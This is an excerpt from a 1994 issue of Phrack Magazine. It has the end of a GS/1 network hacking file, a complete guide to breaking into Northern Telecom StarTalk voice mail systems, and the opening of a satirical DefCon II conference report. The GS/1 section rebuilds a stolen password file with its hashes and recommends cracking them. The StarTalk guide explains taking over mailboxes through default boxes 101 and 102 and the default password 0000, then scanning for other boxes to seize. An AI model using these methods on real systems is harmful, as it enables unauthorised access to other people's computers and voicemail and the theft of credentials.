28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
28530 = [r][o] 30580 = [t][w] 14962 = [r][:]
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
25697 = [a][d] 14929 = [Q][:] 28265 = [i][n]
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
29487 = [/][s] 29283 = [c][r] 17210 = [:][C]
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
28704 = [ ][p] 14895 = [/][:] 13114 = [:][3]
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
28004 = [d][m] 29962 = [^M][u] 25697 = [a][d]
dministration:/:
uucp::4:4:Uucp administration:/
29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
29557 = [u][s] 27746 = [b][l] 28771 = [c][p]
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
20300 = [L][O] 25185 = [a][b] 26990 = [n][i]
LOGIN:6:6:Assignable device administration:/:?sy
26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
26995 = [s][i] 12602 = [:][1] 29811 = [s][t]
sinfo:NOLOGIN:10:10:Access to system information
12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
12090 = [:][/] 18759 = [G][I] 25710 = [n][d]
:/:?network:NOLOGIN:12:12:Mail and Network admin
29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
29545 = [i][s] 28528 = [p][o] 20302 = [N][O]
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
29806 = [n][t] 29545 = [i][s] 28528 = [p][o]
nt spooler administration:/usr/spool/lp:?dos:NOL
18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL
18255 = [O][G] 8307 = [s][ ] 12090 = [:][/]
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
22327 xcU:100:100:NC 8275 operator:/usr/
22327 = [7][W] 8275 = [S][ ]
7WxcU:100:100:NCS operator:/usr
The resulting file will look like the following:
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
dministration:/:
uucp::4:4:Uucp administration:/
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
LOGIN:6:6:Assignable device administration:/:?sy
sinfo:NOLOGIN:10:10:Access to system information
:/:?network:NOLOGIN:12:12:Mail and Network admin
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
nt spooler administration:/usr/spool/lp:?dos:NOL
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
7WxcU:100:100:NCS operator:/usr
Because the ls command cannot display "non-printable" characters such
as the carriage return, it will replace them with a '?' character...
delete the '?' characters and divide by line at these locations. When
you finish doing that, you'll have a standard /etc/passwd file:
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
bin:NOLOGIN:3:3:System file administration:/:
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
asg:NOLOGIN:6:6:Assignable device administration:/:
sysinfo:NOLOGIN:10:10:Access to system information:/:
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
dos:NOLOGIN:16:10:Access to Dos devices:/:
ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr
Once you've assembled your password file in a standard ASCII form,
you'll of course want to crack it with one of the many available DES
cracking programs.
+---------------------+
+ #7: Other Avenues +
+---------------------+
Find out what else you can play with by first finding what networks are
available other than your own, and second, find out what machines are on
your network:
>(!2) GS/1# sh att
> Attached Networks
>&000023B5
>(!2) GS/1# sh nmap l
> NETWORK &000023B5 MAP
>
> 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1
> 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020
> 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1
> 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2
> .... etc.
The boot server address, from previous examples, is number 1
which contains a description "SW/AT-NCS". Examining the rest of the
list, number 6 has the same description. System 12 may be just another
address for the boot server or it may be a different Xenix... but it should
be Xenix whatever it is.
We have refrained from covering the typical GS/1 information that has been
published by others; and instead, covered newer concepts in GS/1 hacking.
This phile is not a complete guide to GS/1 hacking; but expect successive
publications on the topic.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 18 of 26
****************************************************************************
***** ******** **** ***** ******** **** ** ** **
***** **** ** ** ** ** **** ** ** ** ** ***
**** **** ** ** ** ** ** **** ** ** ** ** *****
***** **** ** ** ** *** **** ** ** ****** ** ***
(*) A Complete 'N Easy Guide to Hacking and the (*)
(*) Usage of "StarTalk" Voice Mail Systems (*)
Written By: The Red Skull
07/25/94
Introduction
~~~~~~~~~~~~
There are many types of different voice mail systems out there, that
run on phone systems they are compatible with. You have probably seen a lot
of text files about hacking voice mail systems, on your local bulletin
boards. The popular ones you might have heard about are systems like, Aspen
(Automatic Speech Exchange Network), TMC (The Message Center), Audix, and
Meridian Mail. There are VMB hacking programs that are suppose to hack vmbs
for you. I really don't believe in those kind of programs. When I say this,
I am not talking about programs like Tone Locator or Blue Beep, I am talking
about programs like 'The Aspen Hacker' and any other *VMB* hacking programs.
I am just saying this, so you don't mix this guide up with a vmb hacking
program.
General Information
~~~~~~~~~~~~~~~~~~~
I have decided to write a hacking/user's guide for the StarTalk Voice
Mail System because there is no guide for the StarTalk Voice Mail System,
and almost no one has heard about it. Since this will be the first one for
it, I will try and explain it as simply as possible. You might have heard
of Northern Telecom. They are the makers of StarTalk, but they are also the
makers of a very popular user-friendly Voice Mail System called 'Meridian
Mail'. Both StarTalk and Meridian Mail run on the Norstar telephone system.
StarTalk is designed to function as an extension of the Norstar telephone
system. All the StarTalk software operation is done on a Norstar telephone
set, so that means it doesn't run on a computer terminal. There are 3
different sizes and configurations that the StarTalk Voice Mail System
comes with -
o Model 110 - 2 voice channels, with 1 hour and 50
minutes total storage.
o Model 165 - 4 voice channels, with 2 hours and 45
minutes total storage.
o Model 385 - 4 voice channels, with 6 hours and 25
minutes total storage.
The capabilities of StarTalk Model 385
can be further expanded through an
enhancement option, available in 4, 6
or 8 channel versions, which provides
a total of 9 hours an 45 minutes of
storage.
Right now, you might be wondering what the hell i'm talking about, but
it's simple. The number of voice channels means how many voice mail users
could be using their voice mail. So for example, 4 voice channels, means only
4 voice mail users could be on the voice mail system. The Model 110 can hold
about 25 boxes, the Model 165 can hold 50 boxes and the Model 385 can hold 120
boxes and higher. So, it's better if you find a StarTalk Voice Mail System
that is running Model 385. The part that says 'with 6 hours and 25 minutes
total storage', means how many hours of messages it can store. The Model 385
is also upgradable. I could go on about the models but that's all we need to
know for now. So now that we've finished this, we will get into the part
that you've been waiting for.
Finding a StarTalk Voice Mail System
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You will probably not be able to recognize a StarTalk voice mail system
if you find one using a war dialer, because when a StarTalk system answers,
it will only have the company's personalized automated greeting. There are
only two ways to get a StarTalk system: you either scan it out yourself or
get it from someone else. If you get it from someone else, all the boxes
will probably be gone, used or just not safe.
Recognizing a StarTalk Voice Mail System
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ok, now let's say you have come across a StarTalk system, how do you
know that it's a StarTalk? As I said, you will not be able to tell if it's a
StarTalk system by just calling it. If the system is a Startalk, when the
company's personalized greeting answers, press '*' and it should say -
"Please enter the mailbox number, or press the # sign to use the directory"
Remember, if you press '*' and just sit there, it will repeat the message
one more `time, and then say "Exiting the system."
If you hit '**' it should say -
"Please enter your mailbox number and your password, then press # sign"
If you don't get anything like this, that means it's not a StarTalk Voice
Mail System. If you are still not sure that you have a StarTalk System,
then you can always call 416-777-2020 and listen to the voice and see
if it matches with what you have found.
Finding a Virgin Box
~~~~~~~~~~~~~~~~~~~~
This is a very interesting step and also an easy one. Once you have
found a StarTalk Voice Mail System, the first thing you'll want to do is
get some boxes on it. The interesting part is that you are always guaranteed
to get one box on a StarTalk System. This is because every StarTalk System
has a box that is for the voice mail users to leave any problems they are
experiencing with their vmb. This is the box that almost always has a default
on it, but if the System Admin is smart he will change it. So far, on all the
StarTalk systems that I have come across the default for this box hasn't been
changed. The box number is '101' and the defaults for StarTalk Voice Mail
systems are '0000'. So the first thing you should do is call up the system
and press *101 and the default greeting on the box should say (this greeting
is for box 101 only) -
"This is the Trouble-Report mailbox, if you are experiencing difficulty
using the messaging features, please leave your name, mailbox # and a
detailed description of the problem" *BEEP*
If it says that, press '**' and then when it asks you to enter your mailbox
number and your password, enter '1010000' and press the # sign. If you've
followed everything I've said and the System Admin hasn't changed the
default on this box, it should go ahead and ask you to enter your new
personal mailbox password. There is another box number which is sometimes
at the default which is the System Admin's box at 102. Although this is a
System Admin box, the only System Admin option it has available is to leave
a broadcast message, which leaves a message to all boxes on the system.
This box will have the regular default greeting which is -
"This mailbox is not initialized and cannot accept messages, please
try again later"
Do the same thing you did before, If it says that, press '**' and then when
it asks you to enter your mailbox number and your password, enter '1020000'
and press the # sign. If everything is fine, it should ask you to enter your
new personal mailbox password. This is called Initializing your mailbox, and
I'll talk about this later in this file. So, there you go, you've got your
box on a StarTalk System. All StarTalk Voice Mail Systems that I have run
into so far have had 2-3 digit mailboxes. Now, to hack any other boxes
through the system, you would have to go and keep on trying 3 digit mailbox
number starting with 1XX, until you find an empty box with a regular default
greeting. Let's say you find another empty box at box number 130, you will do
the same thing, press '**' and when it asks you to enter your mailbox number
and your password, enter '1300000' and press the # sign. One thing I like
about box number '101' is that, a lot of System Admin's are not aware that it
even exists, that is because they probably have a lousy TSR (Technical Service
Rep). (This is the person that is suppose to help them install the Voice
Mail System.)
What to do After you've Got A StarTalk Voice Mail Box
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The rest of the file will concentrate on all the inside functions and
options that a StarTalk Voice Mail Box has. We will be covering all
these topics -
o Initializing a Mailbox
o Your Mailbox Greeting
o Recording a Greeting
o Choosing a Mailbox Greeting
o Listening To Messages
o Off-premise Message Notification
o Setting Up Off-premise Message Notification
o Disabling Off-premise Message Notification
o Changing Off-premise Message Notification
o Leaving a Mailbox Message
o Message Delivery Options
o Assigning the Target Attendant
o Quick Reference Tips
Your Mailbox
~~~~~~~~~~~~
Before you can use your mailbox, you must:
- open your mailbox
- change your password
- record your name
- record your personal mailbox greeting(s)
This is called Initializing your mailbox.
Initializing a Mailbox
----------------------
To open and initialize your mailbox:
1. Press * * and Mailbox #
2. Enter the default password '0000'
3. To end the password, press #
4. The StarTalk voice prompt, asks you to enter your new personal mailbox
password.
5. Using touchtones, enter your new mailbox password. Your password can
be from 4 to 8 digits long, but it cannot start with zero.
6. To end your password, press #
7. After you have accepted your password, you are asked to record your name
in the Company Directory, At the tone, record your name.
8. To end your recording, press #
9. To accept your recording, press #
You are now ready to record your personal mailbox greetings. Once your
greetings are recorded, you have the option of selecting either your primary
or alternate greeting. If you do not select a greeting, your primary
greeting plays automatically.
Note: Initializing a mailbox is only done the first time you open your
mailbox. You have to initialize your mailbox to receive messages.
Your Mailbox Greeting
~~~~~~~~~~~~~~~~~~~~~
Each mailbox has a primary and alternate greeting recorded by you.
After you have recorded your personal mailbox greetings, you can choose
which greeting you play to callers reaching your mailbox.
Recording a Greeting
--------------------
To record your greetings, you must first open your mailbox. Once you have
opened your mailbox:
1. Press 8
2. To select Greeting Options, press 2
3. To record your greeting, press 1
4. Select which greeting you are going to record.
Note: You can choose to record either your primary or alternate mailbox
greeting.
5. To record your greeting, press 1
6. At the tone, record your greeting.
7. To end your greeting, press #
8. To accept this recording, press #
Choosing a Mailbox Greeting
---------------------------
After the mailbox greeting is recorded, you can choose which greeting you
are going to use. If you do not choose a mailbox greeting, Startalk
automatically plays your primary greeting. To choose a mailbox greeting
you must open your mailbox. Once you have opened your mailbox:
1. Press 8
2. To select Greeting Options, press 2
3. Press 2
4. Select which mailbox greeting your mailbox is going to use.
Listening To Messages
---------------------
Each time you open your mailbox, StarTalk plays any Broadcast messages left
by the System Admin (don't reply to them!), and also tells you how many other
messages are in your mailbox. Messages are played beginning with any Urgent
messages, followed by the first message left in your mailbox.
To listen to messages, you must open your mailbox. Once you have opened
your mailbox:
1. To listen to messages, press 2 or to listen to your saved messages,
press 6
Your first message starts to play. While listening to a message, or after
a message has played, you can:
Replay the message : 1 1
Back up 9 seconds : 1
Pause and Continue : 2 to pause then 2 to continue
Forward 9 seconds : 3
Skip to the end of message : 3 3
Play the previous message : 4
Forward the message : 5
Skip to the next message : 6
Play time and date stamp : 7
Save a Message : 7 7
Erase the message : 8
Reply to the message : 9
Volume control : *
Note: After listening to the messages left in your mailbox and exiting
StarTalk, all messages you do not erase are automatically saved.
Off-premise Message Notification
--------------------------------
Off-premise Message Notification, to a telephone number or a pager, alerts
you when messages are left in your mailbox. Off-premise Message Notification
is enabled in the StarTalk Class of Service designation by the System
Coordinator.
Setting Up Off-premise Message Notification
-------------------------------------------
To set up Off-premise Message Notification, you must first open your
mailbox. Once you have opened your mailbox:
1. Open the mailbox admin menu, press 8
2. Open the message notification menu, press 6
3. To set up message notification, press 1
4. To select a line, press 1
Note: You can also select line, pool or intercom.
(YOU HAVE TO SELECT LINE)
5. Enter a line, pool or IC number, press #
Note: You have to enter '1', or '01' as the line if 1 doesn't work.
6. To accept the line, pool or IC number, press #
7. Enter the destination telephone number, press #
Note: While you are entering a telephone number, you can press a dialpad
number to represent dialtone recognition or other telephone number options.
When StarTalk is installed with PBX or Centrex and you want to access an
outside line, you must enter the command to recognize dial tone. For
example enter 9 to access an outside line, press # then enter 4 to
recognize dialtone press 2 followed by the destination number, press #
and any required pauses. Each pause entered is four seconds long.
8. To end the telephone number, press #
9. To accept the telephone number, press #
10. To accept the destination type telephone, press # and move to step 12.
To change the destination type to pager, press 1
Note: The destination type can be either telephone or pager. StarTalk
automatically selects telephone. When the pager destination
type is selected, a pause must be inserted. The number of pauses
required depends on the pager system being used.
11. To accept the destination type, press #
If the message destination type is a telephone, you must set a start time.
12. Enter the time when Off-premise Message Notification is to start.
Note: This is a four-digit field. Any single digit hour and minute
must be preceded by a zero.
13. Press 1 for AM, 2 for PM.
14. To accept the start time, press #
15. Enter the time when Off-premise Message Notification is to stop.
Note : This is a four-digit field. Any single digit hour and
minute must be preceded by a zero.
16. Press 1 for AM, 2 for PM.
17. To accept the stop time, press #
18. To accept the message type NEW, press #
To change the message type to URGENT, press 1
Note: The default message type is NEW. This means you are notified
whenever you receive a new message. Changing the message type changes
NEW to URGENT. This means you are only notified when you receive an
urgent message.
19. To accept the message type, press #
The Off-premise Message Notification will begin as soon as the start time
is reached. You will be called whenever you receive a message.
Disabling Off-premise Message Notification
------------------------------------------
To disable Off-premise Message Notification, you must first open your
mailbox, Once your mailbox is open:
1. Open the mailbox admin menu, press 8
2. To access the message notification menu, press 6
3. To listen to the options, press 2
4. To disable message notification, press 1
Off-premise Message Notification is disabled.
Changing Off-premise Message Notification
-----------------------------------------
To change Off-premise Message Notification, you must first open your mailbox,
Once you have opened your mailbox:
1. Open the mailbox admin menu, press 8
2. Open the message notification menu, press 6
3. To change message notification press 1
4. To select a line, press 1
5. Press 1
If you wish to change the line, press #
6. Enter the new line number.
7. To end the line number, press #
8. To accept the line number, press #
9. Press 1
If you do not wish to change the destination telephone number, press #
10. Enter the new destination telephone number.
11. To end the telephone number, press #
12. To accept the telephone number, press #
13. To change the destination type, press 1
14. To accept the destination type, press #
15. To change the start time, press 1
If you do not wish to change the time, press #
16. Enter the time when Off-premise Message Notification is to start.
17. Press 1 for AM, 2 for PM.
18. To accept the start time, press #
19. To change the stop time, press 1
If you do not wish to change the time, press #
20. Enter the time when Off-premise Message Notification is to stop.
21. Press 1 for AM, 2 for PM.
22. To accept the stop time, press #
23. To change the message type, press 1
24. To accept the message type, press #
Leaving a Mailbox Message
-------------------------
You can leave a message directly in any StarTalk mailbox, as long as that
mailbox has been initialized.
To leave a mailbox message:
1. Enter the mailbox # and at the tone, record your message.
2. To end your recording, press #
3. For delivery options, press 3
4. To send your message, press #
Message Delivery Options
------------------------
StarTalk provides you with four message delivery options, which are:
Certified 1 - This delivery option sends you a message and tells you if
the person received and read your message, but this is
only if the message is inside the system.
Urgent 2 - This delivery option marks the message, and plays it before
playing other messages left in your mailbox.
Private 3 - This delivery option prevents a message from being forwarded
to another mailbox.
Normal # - This delivery option sends a message to a mailbox. Normal
messages are played in the order in which they are received,
and can be forwarded to other mailboxes.
After you have recorded your mailbox message, press 3 to access delivery
options. To use one of the delivery options, press the right delivery
option number.
Note: When leaving a message, you can press 9 to listen to StarTalk voice
prompts in the alternate language.
Assigning the Target Attendant
------------------------------
Anyone that presses [0] when they are connected to your box will be
transferred to an operator if your Target Attendant is set to [0] or her
mailbox #.
To change from the Operator to the Target Attendant -
1. Press 8
2. Press 5
3. Press 1
4. Enter <desired extension>
5. Press *
Quick Reference Tips
--------------------
- To save time, you can just interrupt most prompts by press # or selecting
a StarTalk option.
- If you get lost using StarTalk options, press * to replay the option list
```````````````````````````````````````````````````````````````````````````
Ok, this is the end of the StarTalk voice mail guide. I tried my best
to make it as simple as I could with respect to both hacking it
and using it. I plan on writing my next file on Smooth Operator, a
PC-based information processing system. I will probably focus more on
the terminal part of it. I will try and cover the logins and all other
things needed to get around the system. If any readers out there have
comments or suggestions on this article, or on my next article, please
contact me.
If you would like to talk about this, you can find me on IRC with the nick
'redskull' or you can write me a message on my Internet Address.
Internet Address : redskull@io.org
I'd like to thank S. Cleft for giving me some tips and also discovering
some of the things I've mentioned in this file.
```````````````````````````````````````````````````````````````````````````` ==Phrack Magazine==
Volume Five, Issue Forty-Six, File 19 of 28
****************************************************************************
DefCon II: Las Vegas
Cyber-Christ meets Lady Luck
July 22-24, 1994
by Winn Schwartau
(C) 1994
Las Vegas connotes radically different images to radically dif
ferent folks. The Rat Pack of Sinatra, Dean Martin and Sammy
Davis Jr. elicits up the glistening self-indulgent imagery of
Vegas' neon organized crime in the '50's (Ocean's Eleven
displayed only minor hacking skills.)
Then there's the daily bus loads of elderly nickel slot gam
blers from Los Angeles and Palm Springs who have nothing better
to do for twenty out of twenty four hours each day. (Their
dead husbands were golf hacks.) Midwesterners now throng to
the Mississippi River for cheap gambling.
Recreational vehicles of semi-trailor length from East Bullock,
Montana and Euclid, Oklahoma and Benign, Ohio clog routes 80
and 40 and 10 to descend with a vengeance upon an asphalt home
away from home in the parking lot of Circus Circus. By cul
tural demand, every Rv'er worth his salt must, at least once in
his life, indulge in the depravity of Glitter Gulch.
And so they come, compelled by the invisibly insidious derelict
attraction of a desert Mecca whose only purpose in life is to
suck the available cash from addicted visitor's electronic
purses of ATM and VISA cards. (Hacker? Nah . . .)
Vegas also has the distinction of being home to the largest of
the largest conventions and exhibitions in the world. Comdex
is the world's largest computer convention where 150,000 techno-
dweebs and silk suited glib techno-marketers display their
wares to a public who is still paying off the 20% per annum
debt on last year's greatest new electronic gismo which is
now rendered thoroughly obsolete. And the Vegas Consumer Elec
tronic Show does for consumer electronics what the First Amend
ment does for pornography. (Hackers, are we getting close?)
In between, hundreds upon hundreds of small conferences and
conventions and sales meetings and annual excuses for excess
all select Las Vegas as the ultimate host city. Whatever you
want, no matter how decadent, blasphemous, illegal or immoral, at
any hour, is yours for the asking, if you have cash or a clean
piece of plastic.
So, it comes as no surprise, that sooner or later, (and it turns
out to be sooner) that the hackers of the world, the computer
hackers, phone phreaks, cyber-spooks, Information Warriors, data
bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers,
virus writers and perhaps the occasional Cyber Christ again
picked Las Vegas as the 1994 site for DefCon II.
You see, hackers are like everyone else (sort of) and so they,
too, decided that their community was also entitled to hold
conferences and conventions.
DefCon (as opposed to Xmas's HoHoCon), is the premier mid-year
hacker extravaganza. Indulgence gone wild, Vegas notwithstanding
if previous Cons are any example; but now put a few hundred
techno-anarchists together in sin city USA, stir in liberal
doses of illicit controlled pharmaceutical substances, and we
have a party that Hunter Thompson would be proud to attend.
All the while, as this anarchistic renegade regiment marches to
the tune of a 24 hour city, they are under complete surveillance
of the authorities. Authorities like the FBI, the Secret Serv
ice, telephone security . . . maybe even Interpol. And how did
the "man" arrive in tow behind the techno-slovens that belong
behind bars?
They were invited.
And so was I. Invited to speak. (Loose translation for standing
up in front of hundreds of hackers and being verbally skewered
for having an opinion not in 100% accordance with their own.)
"C'mon, it'll be fun," I was assured by DefCon's organizer, the
Dark Tangent.
"Sure fired way to become mutilated monkey meat," I responded.
Some hackers just can't take a joke, especially after a prison
sentence and no opposite-sex sex.
"No really, they want to talk to you . . ."
"I bet."
It's not that I dislike hackers - on the contrary. I have even
let a few into my home to play with my kids. It's just that, so
many of the antics that hackers have precipitated at other Cons
have earned them a reputation of disdain by all, save those who
remember their own non-technical adolescent shenanigans. And I
guess I'm no different. I've heard the tales of depraved indif
ference, hotel hold-ups, government raids on folks with names
similar to those who are wanted for pushing the wrong key on the
keyboard and getting caught for it. I wanted to see teens and X-
generation types with their eyes so star sapphire glazed over that
I could trade them for chips at the craps table.
Does the truth live up to the fiction? God, I hope so. It'd be
downright awful and unAmerican if 500 crazed hackers didn't get
into at least some serious trouble.
So I go to Vegas because, because, well, it's gonna be fun. And,
if I'm lucky, I might even see an alien spaceship.
For you see, the party has already begun.
I go to about 30 conventions and conferences a year, but rarely
if ever am I so Tylonol and Aphrin dosed that I decide to go with
a severe head cold. Sympomatic relief notwithstanding I debated
and debated, and since my entire family was down with the same
ailment I figured Vegas was as good a place to be as at home in
bed. If I could survive the four and half hour plane flight
without my Eustahian tubes rocketing through my ear drums and
causing irreparable damage, I had it made.
The flight was made tolerable becuase I scuba dive. Every few
minutes I drowned out the drone of the engines by honking uncon
trollably like Felix Ungerto without his aspirator. To the
chagrin of my outspoken counter surveillance expert and traveling
mate, Mike Peros and the rest of the first class cabin, the
captain reluctantly allowed be to remain on the flight and not be
expelled sans parachute somewhere over Southfork, Texas. Snort,
snort. Due to extensive flirting with the two ladies across the
aisle, we made the two thousand mile trek in something less than
34 minutes . . . or so it seemed. Time flies took on new mean
ing.
For those who don't know, the Sahara Hotel is the dregs of the
Strip. We were not destined for Caesar's or the MGM or any of
the new multi-gazillion dollar hotel cum casinos which produce
pedestrian stopping extravaganzas as an inducement to suck in
little old ladies to pour endless rolls of Washington quarters in
mechanical bottomless pits. The Sahara was built some 200 years
ago by native slave labor whose idea of plumbing is clean sand
and decorators more concerned with a mention in Mud Hut Daily
than Architectural Digest. It was just as depressingly dingy and
solicitly low class as it was when I forced to spend eleven days
there (also with a killer case of the flu) for an extended Comdex
computer show. But, hey, for a hacker show, it was top flight.
"What hackers?" The desk clerk said when I asked about the show.
I explained. Computer hackers: the best from all over the coun
try. "I hear even Cyber Christ himself might appear."
Her quizzical look emphasized her pause. Better to ignore a
question not understood than to look stupid. "Oh, they'll be
fine, We have excellent security." The security people, I found
out shortly thereafter knew even less: "What's a hacker?" Too
much desert sun takes its toll. Proof positive photons are bad
for neurons.
Since it was still only 9PM Mike and I sucked down a couple of $1
Heinekens in the casino and fought it out with Lineman's Switch
ing Union representatives who were also having their convention
at the Sahara. Good taste in hotels goes a long way.
"$70,000 a year to turn a light from red to green?" we com
plained.
"It's a tension filled job . . .and the overtime is murder."
"Why a union?"
"To protect our rights."
"What rights?"
"To make sure we don't get replaced by a computer . . ."
"Yeah," I agreed. "That would be sad. No more Amtrak
disasters." The crowd got ugly so we made a hasty retreat under
the scrutiny of casino security to our rooms. Saved.
Perhaps if I noticed or had read the original propaganda on
DefCon, I might have known that nothing significant was going to
take place until the following (Friday) evening I might have
missed all the fun.
For at around 8AM, my congestion filled cavities and throbbing
head was awakened by the sound of an exploding toilet. It's kind
of hard to explain what this sounds like. Imagine a toilet
flushing through a three megawatt sound system at a Rolling
Stones concert. Add to that the sound of a hundred thousand flu
victims standing in an echo chamber cleansng their sinuses into a
mountain of Kleenex while three dozen football referees blow
their foul whistles in unison, and you still won't come close to
the sheer cacophonous volume that my Saharan toilet exuded from
within its bowels. And all for my benefit.
The hotel manager thought I was kidding. "What do you mean
exploded?"
"Which word do you not understand?" I growled in my early morning
sub-sonic voice. "If you don't care, I don't."
My bed was floating. Three or maybe 12 inches of water created
the damnedest little tidal wave I'd ever seen, and the sight and
sound of Lake Meade in room 1487 only exascerbatd the pressing
need to relieve myself. I dried my feet on the extra bed linens,
worried about electrocution and fell back asleep. It could have
been 3 minutes or three hours later - I have no way to know -
but my hypnogoic state was rudely interrupted by hotel mainte
nance pounding at the door with three fully operational muffler-
less jack hammers.
"I can't open it," I bellowed over the continual roar of my
personal Vesuvius Waterfall. "Just c'mon in." The fourteenth
floor hallway had to resemble an underwater coral display becuase
the door opened ever so slowly..
"Holy Christ!"
Choking back what would have been a painful laugh, I somehow
eeked out the words, with a smirk, "Now you know what an explo-
ding toilet is like."
For, I swear, the next two hours three men whose English was
worse than a dead Armadillo attempted to suck up the Nile River
from my room and the hallway. Until that very moment in time, I
didn't know that hotels were outfitted with vacuum cleaners
specifically designed to vacuum water. Perhaps this is a regular
event.
Everyone who has ever suffered through one bitches about Vegas
buffets, and even the hackers steered away from the Sahara's
$1.95 "all you can eat" room: "The Sahara's buffet is the worst
in town; worse than Circus Circus." But since I had left my
taste buds at 37,000 feet along with schrapneled pieces of my
inner ear, I sought out sustenance only to keep me alive another
24 hours.
By mid afternoon, I had convinced myself that outside was not the
place to be. After only eighteen minutes of 120 sidewalk egg-
cooking degrees, the hot desert winds took what was left of my
breath away and with no functioning airways as it was, I knew
this was a big mistake. So, hacker convention, ready or not,
here I come.
Now, you have to keep in mind that Las Vegas floor plans are
designed with a singular purpose in mind. No matter where you
need to go, from Point A to Point B or Point C or D or anywhere,
the traffic control regulations mandated by the local police and
banks require that you walk by a minimum of 4,350 slot machines,
187 gaming tables of various persuasions and no less than 17
bars. Have they no remorse? Madison Avenue ad execs take heed!
So, lest I spend the next 40 years of my life in circular pursuit
of a sign-less hacker convention losing every last farthing I
inherited from dead Englishmen, I asked for the well hidden loca-
tion at the hotel lobby.
"What hackers?" There goes that nasty photon triggered neuron
depletion again.
"The computer hackers."
"What computer hackers. We don't have no stinking hackers . . ."
Desk clerk humor, my oxymoron for the week.
I tried the name: DefCon II.
"Are we going to war?" one ex-military Uzi-wielding guard said
recognizing the etymology of the term.
"Yesh, it's true" I used my most convincing tone. "The Khasaks
tanis are coming with nuclear tipped lances riding hundred foot
tall horses. Paris has already fallen. Berlin is in ruins.
Aren't you on the list to defend this great land?"
"Sure as shit am!" He scampered off to the nearest phone in an
effort to be the first on the front lines. Neuron deficiency
beyong surgical repair..
I slithered down umpteen hallways and casino aisles lost in the
jungle of jingling change. Where the hell are the hackers?
"They must be there," another neuron-impoverished Saharan employ
ee said as he pointed towards a set of escalators at the very far
end of the casino.
All the way at the end of the almost 1/4 mile trek through Sodom
and Gonorrhea an 'up' escalator promised to take me to hackerdom.
Saved at last. Upstairs. A conference looking area. No signs
anywhere, save one of those little black Velcro-like stick-em
signs where you can press on white block letters.
No Mo Feds
I must be getting close. Aha, a maintenance person; I'll ask him.
"What hackers? What's DefCon."
Back downstairs, through the casino, to the front desk, back
through the casino, up the same escalator again. Room One I was
told. Room One was empty. Figures. But, at the end of a
hallway, past the men's room and the phones, and around behind
Room One I saw what I was looking for: a couple of dozen T-shirt
ed, Seattle grunged out kids (read: under 30) sitting at uncov
ered six foot folding tables hawking their DefCon II clothing,
sucking on Heinekens and amusing themselves with widely strewn
backpacks and computers and cell phones.
I had arrived!
* * * *
You know, regular old suit and tie conferences could learn a
thing or two from Jeff Moss, the man behind DefCon II. No fancy
badge making equipment; no $75 per hour union labor built regis
tration desks; no big signs proclaiming the wealth of knowledge
to be gained by signing up early. Just a couple of kids with a
sheet of paper and a laptop.
It turned out I was expected. They handed me my badge and what a
badge it was. I'm color blind, but this badge put any psychedel
ically induced spectral display to shame. In fact it was a close
match to the Sahara's mid 60's tasteless casino carpeting which
is so chosen as to hide the most disgusting regurgative blessing.
But better and classier.
The neat thing was, you could (in fact had to) fill out your own
badge once your name was crossed off the piece of paper that
represented the attendee list.
Name:
Subject of Interest:
E-Mail:
Fill it out any way you want. Real name, fake name, alias,
handle - it really doesn't matter cause the hacker underground
ethic encourages anonymity. "We'd rather not know who you are
anyway, unless you're a Fed. Are you a Fed?"
A couple of lucky hackers wore the ultimate badge of honor. An
"I Spotted A Fed" T-shirt. This elite group sat or lay on the
ground watching and scouring the registration area for signs that
someone, anyone, was a Fed. They really didn't care or not if
you were a Fed - they wanted the free T-shirt and the peer re
spect that it brought.
I'm over 30 (OK, over 35) and more than a few times (OK, a little
over 40) I had to vehemently deny being a Fed. Finally Jeff Moss
came to the rescue.
"He's not a Fed. He's a security guy and a writer."
